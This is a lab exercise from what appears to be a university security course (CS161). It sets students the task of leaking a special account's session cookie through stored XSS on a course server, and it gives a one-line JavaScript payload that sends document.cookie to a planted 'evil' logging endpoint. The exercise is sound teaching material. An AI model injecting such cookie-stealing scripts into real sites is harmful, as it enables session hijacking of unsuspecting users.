Leak cs161
’s session cookie (Stored XSS)
Difficulty: Medium
Because it is a special-purpose account, you won’t find cs161
’s session token
in the database. However, cs161
still sends a session_token
cookie to the
server with every request, so you might be able to leak cs161
’s token using a
different attack.
Your CS161 alumni ally has inserted some evil malware that lets you log
arbitrary values to an internal dashboard. When you send a HTTP GET Request to
the /evil/report
endpoint and include a message
parameter, the message
is
posted to the /evil/logs
page. Try it by visiting the following URL in your
browser!
https://box.cs161.org/evil/report?message=hello1234
Your task: Leak cs161
’s session cookie by pushing it onto the /evil/logs
page.
Tips
-
You may want to try this attack on yourself before executing it on another user.
-
You may find this block of JavaScript code useful:
fetch('/evil/report?message='+document.cookie)
- You may assume the cs161 user will be browsing the main pages of the site in the background (e.g. home, list, upload, etc.).